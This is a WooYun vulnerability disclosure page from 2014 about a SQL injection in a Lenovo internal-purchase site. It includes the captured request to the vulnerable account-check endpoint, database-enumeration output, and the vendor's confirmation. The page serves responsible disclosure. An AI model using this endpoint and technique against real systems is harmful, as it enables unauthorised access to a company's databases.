当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-050033

漏洞标题:联想某内购系统再次SQL注射

相关厂商:联想

漏洞作者: he2des

提交时间:2014-01-29 13:22

修复时间:2014-03-15 13:23

公开时间:2014-03-15 13:23

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-01-29: 细节已通知厂商并且等待厂商处理中
2014-01-31: 厂商已经确认,细节仅向厂商公开
2014-02-10: 细节向核心白帽子及相关领域专家公开
2014-02-20: 细节向普通白帽子公开
2014-03-02: 细节向实习白帽子公开
2014-03-15: 细节向公众公开

简要描述:

发现很多人有检查过这个站点,于是再跟着前辈们的脚步有没有收获。

详细说明:

打开目标网站,注册账号的地方有检查账号是否可以注册,这里应该关联的数据库查询。

2014-01-28_211745.png


抓包如下:

GET /ajax/[email protected]&Pwd=&r=0.3971355361863971 HTTP/1.1
Host: ess.lenovomobile.com
Proxy-Connection: keep-alive
Accept: application/json, text/javascript, */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Referer: http://ess.lenovomobile.com/regiStep1.aspx?SalesCode=000062
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: CheckCode=2408

漏洞证明:

漏洞证明:

QQ图片20140128222304.jpg


QQ图片20140128222901.jpg


QQ图片20140128222905.jpg


available databases [12]:
[*] DirectBuy_Test
[*] LeShopSite
[*] LeShopSite_Test
[*] lm_db
[*] lm_db_test
[*] LmShop
[*] LmShop_test
[*] master
[*] model
[*] msdb
[*] ServerMonitor
[*] tempdb

修复方案:

修补不够完善,新年快乐哦。

版权声明:转载请注明来源 he2des@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-01-31 19:54

厂商回复:

感谢您对联想信息安全工作的支持 我们会尽快修复漏洞

最新状态:

暂无